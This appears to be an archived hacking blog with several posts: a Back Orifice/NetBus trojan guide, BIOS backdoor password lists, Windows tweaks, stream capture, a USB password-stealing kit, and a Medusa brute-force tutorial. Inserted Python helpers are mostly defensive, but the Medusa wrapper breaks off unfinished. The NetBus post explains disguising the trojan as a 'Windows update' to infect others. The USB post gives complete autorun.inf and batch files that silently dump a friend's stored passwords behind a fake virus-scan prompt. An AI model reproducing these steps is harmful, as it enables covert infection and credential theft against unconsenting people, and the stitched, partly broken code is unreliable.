Friday, October 11, 2013

TROJANS

Trojan horses: Back Orifice and NetBus.

Back Orifice: The American hacker group Cult of the Dead Cow (http://www.cultdeadcow.com) published a program named "Back Orifice", which it describes as a "remote administration tool for networks". The name already gives away that the intention is something else: Back Orifice ("rear opening") is best translated here as "back door", because the program makes it child's play to wreak havoc on Windows PCs. The pun on Microsoft's "BackOffice" product line is intentional.

The "server module" is only 124 KByte and can be attached to any Windows EXE program in order to slip it to unsuspecting users. If the file is executed under Windows 95 or 98, the server embeds itself almost invisibly in the system. From that moment on the Trojan horse simply waits to be woken up over UDP (by default on port 31337, although the attacker can change this when building the server).

With the client, an attacker can comfortably access the infected computer. Among other things the file system can be manipulated (downloading files and so on, terminating tasks, and much more). The functionality of Back Orifice was already known from other hacker tools; what is new is mainly the convenient operation of the graphical "administration component": a few inputs and mouse clicks are enough to terminate processes, log keystrokes, manipulate the Windows Registry or redirect IP addresses.

An interesting hands-on report (in German) is linked here: check this out, or this one also.

To check your system for an installed Back Orifice, there are programs such as BoDetect (http://www.spiritone.com/~cbenson/current_projects/backorifice/backorifice.htm) or BoRED (http://www.st-andrews.ac.uk/~sjs/bored/bored.html). Removing Back Orifice by hand is also very simple: open the Registry (run regedit.exe) and look under the key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

for an entry named " .exe" (the default file name: a single space followed by .exe) or for an entry whose file is 124,928 bytes long (+/- 30 bytes). Delete this entry; it is what starts the Back Orifice server automatically at every Windows boot. Note that the attacker can rename the server when building it, so the absence of " .exe" proves nothing by itself; look at every entry under this key.

The program usually sits in the directory \Windows\System and can be recognised by the fact that it has no program icon and is 122 KByte (or slightly more) in size. If for some reason you cannot find the file, it helps that various information is contained as ASCII strings in the program code; in particular the string "bofilemappingcon" is almost certainly present, and you can find it with the content search in Explorer.

In addition to the Back Orifice program file, "WINDLL.DLL" is installed in the same directory to log keystrokes. It makes sense to delete this file as well, although on its own it can do no damage.

The problem with Back Orifice is that it is difficult to discover the IP address of the host, since it changes each time the affected computer dials in. Carl Fredrik Neikter solved this problem, and created an even more powerful tool, with his program "NetBus", which is quite similar. It offers even more functions and is simpler to install.




NetBus:

After you have downloaded the appropriate archive, unpack it. You receive three files: NETBUS.EXE, NETBUS.RTF and PATCH.EXE.

PATCH.EXE is the dangerous infection program, the actual Trojan horse, so do not start this file casually! The file NETBUS.RTF contains a short English guide by the author. The file NETBUS.EXE is the "client" with which you access infected servers; it can be started without concern. For testing you can start the server on your own computer: open a DOS prompt, change to the NetBus directory and start the server with the parameter "/noadd" (which keeps it from adding itself to the Registry autostart), i.e. PATCH.EXE /noadd [RETURN]. Do this only on an isolated test machine, since the running server accepts connections from anyone who can reach its port (TCP 12345 by default).

Now the server is running. Start the client (double-click NETBUS.EXE) and access your own computer by entering "localhost" or "127.0.0.1" as the address. To stop the server, select "Server Admin" in the client and then "Close Server".

In addition, the infection program can be modified so that it automatically sends the IP address to a chosen e-mail address as soon as a computer infected with NetBus goes onto the Internet. This is the big advantage over Back Orifice. To do so, select the "Server Setup" button in the NetBus client and enter the appropriate information. The only difficulty is finding a free mail server that accepts mail from any IP address. Then select "Patch Srvr" and choose the infection file to be patched (by default "patch.exe").

Whoever wants to infect another computer can now simply send the file PATCH.EXE by e-mail to another Internet user and call it a "Windows update" or some funny animation. The file can be renamed at will (e.g. Win98update.exe or siedler2_patch.exe). When the file is started, nothing visible happens, but the NetBus server has already installed itself on the computer, hidden, and from now on it is started automatically every time the computer boots.

If the above changes were made to the infection program, you now automatically receive an e-mail with the IP address of the infected computer as soon as it goes online. You can enter this IP address in the NetBus client and manipulate the computer.

Hackers use anonymous e-mail addresses for this, for example from hotmail.com or mail.com.

To protect your system, Norton AntiVirus is recommended, which recognises NetBus as well as Back Orifice. You can also work manually again. The automatic NetBus start is registered in the Registry under

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

and should be removed. However, the file name can vary (patch.exe, sysedit.exe or explore.exe are some well-known names). Note that sysedit.exe is also the name of a legitimate Windows utility and explore.exe is one letter away from explorer.exe, so judge an entry by its full path and the file it points to, not by the name alone.
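The two registry checks above (RunServices for Back Orifice, Run for NetBus) and the size/string fingerprint can be scripted. The following is an added example written for this page, not code from the post or from any of the tools it names. It reads the keys with Python's winreg module when run on Windows; elsewhere read_autostart_entries() returns an empty list and you feed suspicious_entries() entries of your own. The indicator values (" .exe", 124,928 +/- 30 bytes, "bofilemappingcon", the NetBus file names) are taken from the post; everything else is my assumption.

```python
"""Audit the Windows autostart keys named above for Back Orifice / NetBus indicators.

Added example for this post; not code from Back Orifice, NetBus, BoDetect or any
other tool mentioned. Assumption: the registry is read with Python's winreg module
when running on Windows; on other systems read_autostart_entries() returns [].
"""
import ntpath

# Indicators taken from the post.
BO_DEFAULT_NAME = " .exe"          # a single space followed by .exe
BO_SIZE = 124_928                  # bytes, +/- 30
BO_SIZE_TOLERANCE = 30
BO_MARKER = b"bofilemappingcon"    # ASCII string inside the BO server binary
NETBUS_NAMES = {"patch.exe", "sysedit.exe", "explore.exe"}

AUTOSTART_KEYS = (
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",
)


def read_autostart_entries(keys=AUTOSTART_KEYS):
    """Return [(key_path, value_name, command)] from HKLM; empty list off Windows."""
    try:
        import winreg
    except ImportError:          # not on Windows: pass entries to suspicious_entries() yourself
        return []
    entries = []
    for key_path in keys:
        try:
            key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path)
        except OSError:          # key absent on this Windows version
            continue
        with key:
            index = 0
            while True:
                try:
                    name, data, _type = winreg.EnumValue(key, index)
                except OSError:  # no more values under this key
                    break
                entries.append((key_path, name, str(data)))
                index += 1
    return entries


def command_path(command):
    """Executable part of a Run-key command: '"C:\\x y.exe" /q' -> 'C:\\x y.exe'."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def file_looks_like_bo(path):
    """Back Orifice fingerprint from the post: size 124,928 +/- 30 or the marker string."""
    try:
        with open(path, "rb") as f:
            data = f.read()
    except OSError:              # missing or unreadable: cannot fingerprint
        return False
    return abs(len(data) - BO_SIZE) <= BO_SIZE_TOLERANCE or BO_MARKER in data


def suspicious_entries(entries):
    """Return [(key_path, value_name, path, [reasons])] for entries worth a look."""
    findings = []
    for key_path, name, command in entries:
        path = command_path(command)
        base = ntpath.basename(path).lower()   # ntpath handles C:\ paths on any OS
        reasons = []
        if name == BO_DEFAULT_NAME or base == BO_DEFAULT_NAME:
            reasons.append("Back Orifice default file name ' .exe'")
        if base in NETBUS_NAMES:
            reasons.append("well-known NetBus file name (verify the full path)")
        if file_looks_like_bo(path):
            reasons.append("Back Orifice size/string fingerprint")
        if reasons:
            findings.append((key_path, name, path, reasons))
    return findings


if __name__ == "__main__":
    for finding in suspicious_entries(read_autostart_entries()):
        print(finding)
```

A hit on a name alone (patch.exe, sysedit.exe) is a lead, not a verdict: a real sysedit.exe ships with Windows, so compare the path and the file's size and strings before deleting the value. Deleting the Run-key value only stops the autostart; the server file itself still has to be removed.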

Saturday, September 7, 2013

How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered by the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS password.

DISCLAIMER

This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. I am not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturer's backdoor password to access the BIOS.

Using password cracking software.

Resetting the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes.

Overloading the keyboard buffer.

Using a professional service.

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this is laptops, especially IBM ThinkPads, which silently lock the hard drive (with a drive-level ATA password) if the supervisor password is enabled. If the supervisor password is reset without resetting the hard drive password as well, you will be unable to access the data on the drive.


Backdoor passwords.

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key that produces "_" on a US keyboard produces "?" on some European layouts, which is why variants such as AWARD_SW and AWARD?SW both appear in the lists below. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name-brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords.


Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222 589589 589721 595595 598598.

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer      Password
VOBIS & IBM       merlin
Dell              Dell
Biostar           Biostar
Compaq            compaq
Enox              xo11nE
Epox              central
Freetech          posterie
IWill             iwill
Jetway            spoom1
Packard Bell      bell
QDI               QDI
Siemens           SKY_FOX
TMC               BIGO
Toshiba           toshiba


TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

CMOS Password Recovery Tools 3.1, !BIOS, RemPass, KILLCMOS.

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.

Please remember to unplug your PC and use a grounding strap before reaching into your PC and touching the motherboard. Once you locate and reset the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to their original position.

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.

Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Sunday, August 25, 2013

Hack xp

Change text on XP Start Button

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located in C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource Hacker is a freeware utility to view, modify, rename, add, delete and extract resources in 32-bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file C:\Windows\explorer.exe. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File menu. Do not use the Save command; use Save As and choose a new name for the file, because Windows File Protection watches explorer.exe and would quietly restore the original over an in-place edit. Save the newly named file to C:\Windows.

Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text. If instead you get an empty desktop, the Shell value does not match the saved file name: press Ctrl+Shift+Esc to open Task Manager, choose File > New Task (Run...), run regedit and correct the value (or set it back to explorer.exe). Keep in mind that this same Shell value is a favourite place for malware to start itself in place of Explorer, so on a machine you did not modify yourself, anything other than explorer.exe there deserves a closer look.

Wednesday, August 21, 2013

Download any streaming file

HOW TO CAPTURE STREAMING MEDIA.

Many websites (e.g. http://ww.smashits.com) stream songs and videos, and people believe these cannot be downloaded; quite why I don't know. They seem to think there is no file present to download. But the player has to fetch the stream from some address, and that address can be found by watching the network traffic.

Once the file's address is located it can be retrieved with NetTransport, which is able to download any file, whether it is served over FTP, RTSP or another protocol.

  1. Download Project URL Snooper 1.02.01 from http://rain66.at.infoseek.co.jp/
  2. Install URL Snooper (together with WinPcap)
  3. Don't run URL Snooper when it is done installing
  4. Restart the computer
  5. Open Project URL Snooper
  6. Click on the General Options tab
  7. Choose a network adapter
  8. Now click on the Search tab
  9. Click Sniff Network
  10. Go to a web page and you should see some results in the results list
  11. If nothing is appearing, choose another network adapter until one works
  12. Now you are ready to begin searching
  13. Tick the "Hide Non-Streaming URLs" option to hide all http:// references and only show URLs corresponding to streaming audio/video (rtsp, pnm, wma, etc.)
  14. Then click Sniff Network
  15. Your links should appear as you begin streaming your file
  16. Select your desired stream (usually an .rm file)
  17. At the bottom there will be the link, which you simply copy
  18. Download NetTransport from here:

    ftp://down_transport:123@s1.5fox.com/NT2Setup_multi.EXE or

    ftp://nettransport:nettransport@61.153.24...Setup_multi.EXE

    http://lycos26486.l97.lycos.com.cn/download.htm

    Or just google it.
  19. Install it
  20. Click on New
  21. Paste the link
Now you should be able to download any file. If you need any help, just ask. I think dial-up users may have problems.
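What the sniffing steps above boil down to is picking scheme://... tokens out of raw packet payloads and keeping only the streaming ones. The Python below is an added example, not URL Snooper's or NetTransport's code: it runs over constructed sample payloads standing in for what WinPcap would capture, and the scheme and extension lists are my assumptions, seeded from the formats the post names (rtsp, pnm, wma, .rm). It also shows why the http:// link you copy is often only a .ram metafile: the real rtsp:// address is inside it, and that is what the downloader finally needs.

```python
"""Find streaming-media URLs in captured traffic, the way the "Sniff Network" step does.

Added example, not code from URL Snooper or NetTransport. Packet capture itself is
left out: SAMPLE_PAYLOADS are constructed stand-ins for raw TCP payloads. The
scheme and extension lists are assumptions seeded from the post (rtsp, pnm, wma, .rm).
"""
import re

STREAM_SCHEMES = {"rtsp", "pnm", "mms", "mmsh", "mmst"}
STREAM_EXTENSIONS = (".rm", ".ram", ".ra", ".wma", ".wmv", ".asf", ".asx", ".smil")
URL_RE = re.compile(rb"\b[a-z]{3,5}://[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample traffic: an HTML page linking a .ram metafile and a logo,
# then the RTSP request the player makes once it has read the metafile.
SAMPLE_PAYLOADS = [
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b'<a href="http://www.example.com/songs/track1.ram">Play</a>'
    b'<img src="http://www.example.com/img/logo.gif">',
    b"DESCRIBE rtsp://media.example.com/songs/track1.rm RTSP/1.0\r\nCSeq: 1\r\n",
]
# Constructed body of the .ram metafile: one line naming the actual stream.
SAMPLE_METAFILE = b"rtsp://media.example.com/songs/track1.rm?cloakport=8080,554\n"


def extract_urls(payload):
    """Every scheme://... token in a raw payload, decoded as text."""
    return [m.group(0).decode("latin-1") for m in URL_RE.finditer(payload)]


def is_streaming(url):
    """True for stream protocols or stream/metafile extensions (the filter's rule)."""
    scheme, _, rest = url.partition("://")
    path = rest.split("?", 1)[0].lower()
    return scheme.lower() in STREAM_SCHEMES or path.endswith(STREAM_EXTENSIONS)


def streaming_urls(payloads):
    """De-duplicated streaming URLs in order seen: the "Hide Non-Streaming URLs" view."""
    seen, found = set(), []
    for payload in payloads:
        for url in extract_urls(payload):
            if is_streaming(url) and url not in seen:
                seen.add(url)
                found.append(url)
    return found


def resolve_metafile(url, body):
    """A .ram/.asx link is only a pointer; its body names the real stream to download."""
    if url.lower().split("?", 1)[0].endswith((".ram", ".asx")):
        inner = [u for u in extract_urls(body) if is_streaming(u)]
        if inner:
            return inner
    return [url]


if __name__ == "__main__":
    for url in streaming_urls(SAMPLE_PAYLOADS):
        print(url, "->", resolve_metafile(url, SAMPLE_METAFILE))
```

On a switched LAN the capture only sees your own machine's traffic, which is all this needs: the stream request has to leave your PC before the player can play it.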

Monday, August 19, 2013

Hack your friends password

How to hack passwords using USB Drive

Today I will show you how to collect stored passwords using a USB pen drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords for MSN, Yahoo, AOL, Windows Messenger etc.

Along with these, Windows also stores the passwords of Outlook Express, SMTP, POP and FTP accounts and the auto-complete passwords of browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pen drive you can create a self-launching toolkit that dumps the passwords stored on your friend's or college computer. (It is not a rootkit in any technical sense: nothing here hides itself or touches the kernel; it is a set of ordinary password-recovery utilities started from autorun.)

We need the following tools to create our toolkit:


MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView :Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


IE Passview :IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView:Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox:PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step-by-step procedure to create the password recovery toolkit. NOTE: You must temporarily disable your antivirus before following these steps, because most antivirus products classify these password-recovery utilities as hacking tools and quarantine them as soon as they are extracted.
  1. Download all 5 tools, extract them and copy only the executables (.exe files) onto your USB pen drive.

    i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.
  2. Create a new Notepad file and write the following text into it:

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

    Save the file and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen drive. The ACTION text is the label the AutoPlay dialog shows next to the drive's own option, which is what gets the user to pick it.
  3. Create another Notepad file and write the following text into it:

    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt

Save the file and rename it from New Text Document.txt to launch.bat. Copy launch.bat to your USB drive as well. (The /stext switch tells each tool to write its results to the named text file instead of opening a window.) Now your toolkit is ready and you are all set to collect the passwords. You can use this pen drive on your friend's PC or on your college computer. Just follow these steps:
  1. Insert the pen drive and the AutoPlay window will pop up (because we have created an autorun pen drive).
  2. In the pop-up window, select the first option (Perform a Virus Scan).
  3. Now all the password recovery tools are executed silently in the background (this takes hardly a few seconds). The passwords are stored in the .TXT files.
  4. Remove the pen drive and you'll see the stored passwords in the .TXT files.
This works on Windows 2000, XP and Vista as long as AutoRun is enabled for removable drives. Windows 7, and XP/Vista with update KB971029 installed, no longer honour autorun.inf on USB flash drives, so there launch.bat has to be started by hand.

NOTE: This procedure will only recover the passwords (if any) that are already stored on the computer, and only those belonging to the Windows user who is logged in when launch.bat runs, since the browser and mail stores are kept per user profile.
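The autorun.inf above is a two-line social-engineering payload: open= names the program to run and ACTION= supplies the label the AutoPlay dialog shows next to it. The following is an added example (not from the post or from NirSoft) that parses an autorun.inf and reports what it would execute and whether its label imitates a system prompt; the two sample files are constructed (MALICIOUS_INF is the file the post tells you to write, BENIGN_INF a typical vendor file) and the list of suspicious words is my own assumption.

```python
"""Inspect an autorun.inf for the launch-and-spoof pattern used above.

Added example; not code from the post or from any NirSoft tool. MALICIOUS_INF is the
file the post tells you to write, BENIGN_INF a typical vendor file; both are
constructed here. SPOOF_WORDS and SCRIPT_EXTENSIONS are my assumptions.
"""
import configparser

LAUNCH_KEYS = ("open", "shellexecute")
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js", ".exe", ".scr", ".com", ".pif")
# Phrases a user expects to come from Windows or an AV product, not from the drive.
SPOOF_WORDS = ("virus", "scan", "update", "open folder", "windows")

MALICIOUS_INF = """[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
"""

BENIGN_INF = """[autorun]
icon=setup.exe,0
label=Vendor Drive
"""


def parse_autorun(text):
    """Lower-cased key/value map of the [autorun] section; {} if absent or unparsable."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:   # e.g. keys before any section header
        return {}
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k.lower(): v.strip() for k, v in cp.items(section)}
    return {}


def audit_autorun(text):
    """Human-readable findings; an empty list means nothing executes on insertion."""
    cfg = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        if key in cfg:
            findings.append(f"{key}= runs {cfg[key]} when the drive is inserted")
    for key, value in cfg.items():
        # shell\<verb>\command= adds or overrides an Explorer context-menu action
        if key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(f"{key}= runs {value} from the Explorer context menu")
    target = (cfg.get("open") or cfg.get("shellexecute") or "").lower()
    if target.endswith(SCRIPT_EXTENSIONS):
        findings.append(f"launch target {target} is a script or executable")
    action = cfg.get("action", "")
    if action and any(word in action.lower() for word in SPOOF_WORDS):
        findings.append(f'ACTION "{action}" imitates a system or antivirus prompt')
    return findings


if __name__ == "__main__":
    for label, text in (("malicious", MALICIOUS_INF), ("benign", BENIGN_INF)):
        print(label, audit_autorun(text) or ["clean"])
```

Run it against the autorun.inf of any drive you are handed; an icon= and label= only file is cosmetic, while anything under open=, shellexecute= or shell\...\command= executes code the moment the user accepts the dialog.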

Saturday, August 17, 2013

BACKTRACK TUTORIALS

Exploitation

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.

Medusa comes installed on Backtrack 5. However, if you are using a different version of backtrack without Medusa type:

apt-get update

apt-get install medusa

When using online password crackers, the potential for success can be greatly increased if you combine this attack with information gathered from reconnaissance and scanning, for example usernames, passwords and e-mail addresses you have already found. Programs like Medusa take a username and a password list and keep guessing until all the passwords have been tried. Be aware that some remote access systems employ a password throttling technique that limits the number of unsuccessful log-ins you are allowed: your IP address can be blocked or the account locked out if you enter too many incorrect guesses. Count your wordlist against the lockout threshold before you start, or you will lock out the very account you are trying to get into.

Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:

/pentest/passwords/wordlists/



In order to execute the brute-force attack, you open a terminal and type the following:

medusa -h target_ip -u username -P path_to_password_dictionary -M service_to_attack

"-h" is used to specify the IP address of the target host. "-u" is used for a single username that Medusa will use to attempt log-ins (use "-U" for a file of usernames). "-P" is used to specify an entire list containing multiple passwords and must be followed by the actual path to the dictionary file ("-p" gives a single password instead). The "-M" switch is used to specify which service we want to attack; "medusa -d" lists the available modules, and "-n" overrides the service's default port.
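Wrapping the command line above in a script lets you check the wordlist against a lockout threshold first and parse Medusa's result lines afterwards. This is an added example, not part of Medusa or BackTrack. It assumes Medusa's "ACCOUNT FOUND: [module] Host: ... User: ... Password: ... [SUCCESS]" line format (check it against your build's output), a placeholder target and wordlist path, and a constructed SAMPLE_OUTPUT.

```python
"""Run Medusa from Python with the options described above and parse what it finds.

Added example, not part of Medusa or BackTrack. Assumptions: the "ACCOUNT FOUND"
line format below matches Medusa 2.x output (verify against your build); the host,
user and wordlist path in main() are placeholders; SAMPLE_OUTPUT is constructed.
"""
import re
import subprocess

# One success line per found credential, as Medusa prints it.
FOUND_RE = re.compile(
    r"ACCOUNT FOUND: \[(?P<module>[^\]]+)\] Host: (?P<host>\S+) "
    r"User: (?P<user>\S+) Password: (?P<password>.*?) \[SUCCESS\]"
)

# Constructed sample of a short run: two misses, then a hit with a space in the password.
SAMPLE_OUTPUT = """\
ACCOUNT CHECK: [ssh] Host: 192.0.2.10 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (1 of 3 complete)
ACCOUNT CHECK: [ssh] Host: 192.0.2.10 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (2 of 3 complete)
ACCOUNT FOUND: [ssh] Host: 192.0.2.10 User: admin Password: Summer 2013 [SUCCESS]
"""


def build_medusa_argv(host, user, wordlist, module, port=None, threads=1,
                      stop_on_success=True, output=None):
    """argv for Medusa as a list (no shell), mirroring the command line in the post."""
    argv = ["medusa", "-h", host, "-u", user, "-P", wordlist, "-M", module,
            "-t", str(threads)]
    if port is not None:
        argv += ["-n", str(port)]       # non-default service port
    if stop_on_success:
        argv.append("-f")               # stop after the first valid pair on this host
    if output:
        argv += ["-O", output]          # also log results to a file
    return argv


def parse_found(lines):
    """[{module, host, user, password}] for every ACCOUNT FOUND line."""
    results = []
    for line in lines:
        match = FOUND_RE.search(line)
        if match:
            results.append(match.groupdict())
    return results


def count_words(wordlist_path):
    """Non-empty lines in the dictionary, i.e. guesses per user a full run makes."""
    with open(wordlist_path, "rb") as f:
        return sum(1 for line in f if line.strip())


def exceeds_lockout(guesses, lockout_threshold):
    """True when a full run would trip a lockout policy of N failed attempts."""
    return lockout_threshold is not None and guesses >= lockout_threshold


def run_medusa(argv):
    """Run Medusa and return the parsed credentials (needs medusa on PATH)."""
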